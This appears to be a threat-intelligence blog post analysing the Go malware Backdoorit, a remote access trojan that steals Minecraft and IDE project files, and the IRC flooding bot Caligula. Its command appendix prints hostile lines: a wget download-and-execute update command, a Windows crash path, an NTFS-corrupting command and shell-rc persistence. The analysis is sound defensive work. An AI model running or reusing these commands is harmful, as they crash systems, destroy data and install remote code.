The Go programming language is becoming more and more popular. One of the reasons being that Go programs can be compiled for multiple operating systems and architectures in a single binary self containing all needed dependencies. Based on these properties, and as we expected, we observed an increase in the number of malware and gray tools written in Go programming language in the last months. We are discovering new samples weekly.
For instance, in late April
, we discovered two new strains in our internal honeypots, namely Backdoorit
and Caligula
, both of which were at that time undetected on VT.
Both of these malware strains are multiplatform bots compiled for many different processor architectures and written in the Go programming language.
Analyzing Backdoorit
(version 1.1.51562578125) is a multiplatform RAT
written in Go programming language and supporting both Windows
and Linux/Unix
operating systems. In many places in the code it’s also referred to as backd00rit
Based on the close inspection of the analyse-full
command of Backdoorit
, we concluded that the main purpose of this malware is stealing Minecraft
related files, Visual Studio
and Intellij
But the malware is not limited just to those files. Some commands (upload
, basharchive
, bashupload
and so on) allow it to steal arbitrary files and information, install other malware in the system or run arbitrary commands (run
, run-binary
, etc.) and take screenshots of the user activity (screenshot
, ssfile
and so on).
Evidence indicates that the Backdoorit
developer is not a native English speaker, further pointing to a possible Russian threat actor. The comments and strings in the code are mostly written in English but often grammatically incorrect. For instance, we found the message: “An confirmation required, run ”. We also discovered some isolated strings written in the Russian language.
In addition to the aforementioned strings we also observed that, amongst others, the VimeWorld files (a Russian project that offers Minecraft servers) are being targeted. This further leads us to believe the Russian origin of the threat actor behind this malware.
After running Backdoorit
the RAT
retrieves some basic environment information such as the current operating system and the name of the user. It then continuously tries to connect to a C&C
server to give the attacker access to a shell.
The malware logs all executed operations and taken steps via a set of backd00r1t_logging_*
functions. Those logs can be uploaded to the server of the attacker either by using uploadlogs
and uploadlogs-file
shell commands or automatically in case a Go panic exception is raised.
In such case backd00r1t_backdoor_handlePanic
handles the exception and performs the following actions:
- It first sends the logs to the endpoint
of theC&C
server with aJSON
request structure as defined in the function:backd00r1t_api_SendLogs
. - It closes the connection with the C&C server.
- It attempts to reconnect again.
The mentioned handler helps to keep the bot connected and also allows the attacker to remotely follow the execution trace.
Once the connection to C&C succeeds, the attacker gets the context information listed below. The function backd00r1t_backdoor_SocketConnectionHandle
is responsible for handling all the commands supported by this RAT and first calls to backd00r1t_backdoor_printMotd
for displaying such information:
- Last connected time
- The Backdoorit version
- Process
- Active connections
- User name
- User home
- User id
- Login
- Gid
- Process path
- Modules Autostart state
The shell allows the threat actor to remotely execute arbitrary commands. The first command that is likely to be run is the analyse-full
command because it generates a report.txt
file containing the Desktop
, Documents
, Downloads
, Minecraft
and VimeWorld
folder file trees and uploads the mentioned report and both Visual Studio
and IntelliJ
projects folders contents, to Bashupload, a web service allowing to upload files from command line with a storage limitation of 50GB
As mentioned earlier, if the attacker chooses to do so, he/she will be also able to implant other malware in the system. The threat actor can use the commands: run-binary
(a command for downloading and executing a script), shell
(a command allowing to spawn the operating system shell and execute arbitrary commands) or other available commands.
The malware also contains a sort of a “kill-switch
” that can be triggered by the exploit
command, but in this case this does not simply remove the malware itself, but has the ability to crash the Windows operating system by exploiting CVE-2021-24098 and also corrupt the NTFS of the hard disk via CVE-2021-28312 on vulnerable systems. This leads to complete loss of file information (including size, time and date stamps, permissions and data content) as well as, of course, removing evidence of the infection.
There are many more commands implemented in the shell that you can check at the corresponding section of the Appendix. As you will notice, the malware incorporates a checkupdates
command so we may expect to see new versions of Backdoorit
Analyzing Caligula
is a new IRC
multiplatform malicious bot that allows to perform DDoS
The malware was written in Go programming language and distributed in ELF
files targeting several different processor architectures:
- Intel 80386 32-bit
- ARM 32-bit
- PowerPC 64-bit
- AMD 64-bit
It currently supports Linux
and Windows
platforms via WSL
and uses the function os_user_Current
for determining the underlying operating system.
is based on the Hellabot open source project, an easily modifiable event based IRC bot
with the ability to be updated without losing connection to the server.
Of course, more code reuse was found in the Caligula
coming from open source projects (log15, fd, go-shellwords, go-isatty and go-colorable) but the core functionality is based on Hellabot
All the samples that we hunted in the wild are prepared to connect to the same hardcoded IRC channel by using the following data:
- Host:
- Channel: #caligula
- Username: It is composed of the platform, current user and a pseudo-random number.
- e.g. [LINUX]kali-11066
As shown in the following screenshot, the bot is prepared for joining the Caligula IRC Net v1.0.0
Caligula IRC Net v1.0.0
is a botnet ready for flooding. The bots offers to the attacker the following attacks:
Attack | Description |
udp | udp flood with limited options. |
http | http flood with no options at all. |
syn | syn flood. |
handshake | handshake flood. |
tcp | tcp flood. |
For more information on how Caligula bot source code is organized, check the source code file listing available in the appendix. It can be useful for getting a high level perspective on the malware design, notice that new attack methods can be easily added to it and identify the Caligula malware family.
Due to its native multiplatform support and relative ease of development, the use of Go programming language for malicious purposes is currently growing, especially in malware targeting Unix/Linux operating systems.
Naturally with the growing interest and community around the Go programming language, some of the malicious tools are being open sourced on Github and resued by different threat actors.
In this instance, we were one of the firsts in hunting and detecting Backdoorit and Caligula.
Backdoorit shell commands reference
Command syntax | Description |
shell | This command spawns a shell. For Windows platforms, if available, it executes Powershell. Otherwise it executes the Command prompt. For the rest of the platforms, it spawns a Bash Unix shell. |
help | Shows the help containing the available commands but also some status information. |
toggle-path | Enables or disables showing the toggle path. |
bell | Enables or disables the bell sound. |
clear-fallback | Clears the screen. |
background-logs | Asks to the attacker for the buffer size and the maximum buffer size in order to store the logs in background. |
backdoor | Shows the RAT information: BuiltCodenameVersionReconnect time |
clear-code | Resets any style property of the font by using the ANSI Escape Codes : \x1B[0J |
clear-color | Clears the shell coloring. |
colors / color | Enables or Disables the shell coloring. |
un-export [env][fir][key][url] | Removes an environment variable. |
export | Adds an environment variable. |
mkdir [path] | Creates a folder for the specified path. |
exit | Exits. |
wcd | Prints the working directory. |
motd | Prints the following information: Last connected time. The Backdoorit version. ProcessActiveConnectionsUser nameUser homeUser idLoginGidProcess path The modules Autostart state. |
get-asset [asset] | Access to an asset (those are identified by string and accessed via GO language mapaccess1_faststr function) |
extract-asset [asset] (path) | Extracts an asset to the specified path. |
safe | Allows to disable safe mode |
open-file | Open file. |
open | Open url in browser. |
list-windows-disks | List disks (command available for Windows systems) |
cp [target] [dist] | Copy file. |
rm | Removes a file or a folder and all its content. If the attacker is trying to remove the entire current folder, the agent asks her/him for preventing the human error. |
cd | Changes the working directory. |
ls | It shows the modification date, Filename and Size. |
cat [file][path] | Read file. |
checkupdates | It asks for the version to the endpoint: /api/version If there is a new version available for the appropriate operating system, then it downloads it by using wget: wget -O app –user nnstd –password access && chmod +x app && ((./app) &) |
exploit [exploit] […args] | Runs an exploit. It currently supports the following exploits: windows/crash/uncIt crashes Windows by accessing the file: \\.\globalroot\device\condrv\kernelconnectwindows/destroy/i30It corrupts the drive by executing the following command: cd C:\\:$i30:$bitmap |
autostart | It persists the payload by modifying the following files: .bashrc .profile .zshrc .bash_profile .config/fish/ This command enables the internal flag: backd00r1t_modules_autostart_state |
autostart-update | Update autostart. |
exec [cmd] […args] | Executes a command with the specified arguments. |
sysinfo {detailed} | Shows the following system information: WorkingDirectory, Command line, User, Terminal |
neofetch / screenfetch | Shows the following system information: CPU Info: Family, Vendor, PhysicalID. CoresHost InfoUptime, OS, Platform, Platform Family, Platform Version, Host ID, Kernel Arch, Kernel Version, Network Interfaces Info: HW Addr, Flags, Index |
Screenshot / ssfile / screen | It creates a screenshot, and stores it in a PNG file located in one of the following directories. It depends on the platform: Windows: C:\Users\{username}\AppData\Local\Temp Linux: /tmp/ Finally, the screenshot is uploaded and, after that, it removes the file from disk. |
archiveapi | It creates a file following the format: tmp-archive-{current_date}.gdfgdgd For Windows platforms: C:\\Users\\{username}\\AppData\\Local\\Temp For Linux platforms: /tmp/ The function removes the previous file in case a file with the same name does exist. Then it sends the file and after that, removes the file |
Create-archive [output] [target] | Create archive with files from target in output. |
Uploadapi [file][path] | Automatically uploads the file specified to predefined servers. |
uploadlogs-file | Uses the /api/upload API endpoint for uploading the file agent.log |
uploadlogs | It sends the logs to the API endpoint /api/logs in JSON format. |
upload [url] [file] | Upload file to Server (HTTP). |
bashupload [file][path] | Automatically upload file to |
bashdownload | Access the file in with the parameter: ?download=1 |
bashupload-parse [file][path] | Automatically upload file to and get direct link |
basharchive [target] | Create archive and upload it to |
download | Downloads a file. |
bashdownload [url] | Downloads the file by querying the url: With the parameter: ?download=1 |
run [url] | Download script and run it. |
run-binary | Download script, and run it. Currently, it only supports Windows platforms. It downloads the run-script.ps1 file to a temporary folder and executes it. |
cls | Clear screen. |
$STOP | This command stops Backdoorit. |
analyse-full | It creates a report report.txt containing:{USERHOME}\source\repos{USERHOME}\IdeaProjectsDesktop file tree Documents file tree Downloads file tree AppData\Roaming\.minecraft file tree AppData\Roaming\.vimeworld file tree. It uploads the files in Visual Studio repos folder and IntelliJ projects folder via backd00r1t_analyze_uploadDirectorybut also a report of the files in the main computer folders via backd00r1t_analyze_uploadFile |
Backdoorit bot source code listing
- H:/backdoorIt//injected/backdoor/BackdoorEnvironment.go
- H:/backdoorIt//injected/backdoor/BackgroundTasks.go
- H:/backdoorIt//injected/backdoor/CommandHelpers.go
- H:/backdoorIt//injected/backdoor/ConnectionHandler.go
- H:/backdoorIt//injected/files/Assets.go
- H:/backdoorIt//injected/api/Configuration.go
- H:/backdoorIt//injected/backdoor/ExecHandlers.go
- H:/backdoorIt//injected/backdoor/ExecHandlers__linux.go
- H:/backdoorIt//injected/backdoor/main.go
- H:/backdoorIt//injected/launcher/main.go
Caligula bot source code listing
- /root/irc/bot/attack/attack.go
- /root/irc/bot/attack/methods.go
- /root/irc/bot/attack/parser.go
- /root/irc/bot/attack/flags.go
- /root/irc/bot/network/header.go
- /root/irc/bot/network/ip.go
- /root/irc/bot/network/tcp.go
- /root/irc/bot/routine/timedRoutine.go
- /root/irc/bot/attack/methods/httpflood.go
- /root/irc/bot/attack/methods/sshflood.go
- /root/irc/bot/attack/methods/synflood.go
- /root/irc/bot/attack/methods/tcpflood.go
- /root/irc/bot/attack/methods/udpflood.go
- /root/irc/bot/handle.go
- /root/irc/bot/singleInstance/singleinstance.go
- /root/irc/bot.go
The complete Backdoorit and Caligula IoCs are in our IoC repository.